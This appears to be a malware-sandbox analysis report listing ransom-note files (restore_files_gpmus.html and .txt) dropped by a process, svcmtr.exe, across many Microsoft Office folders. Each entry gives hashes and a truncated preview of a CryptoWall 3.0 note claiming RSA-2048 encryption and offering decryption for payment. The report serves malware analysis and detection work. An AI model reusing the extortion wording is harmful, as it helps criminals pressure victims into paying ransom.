                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Library\Analysis\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Library\SOLVER\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Library\SOLVER\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Library\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Library\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\MEDIA\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\MEDIA\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\OneNote\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\OneNote\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PAGESIZE\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PAGESIZE\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\1036\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
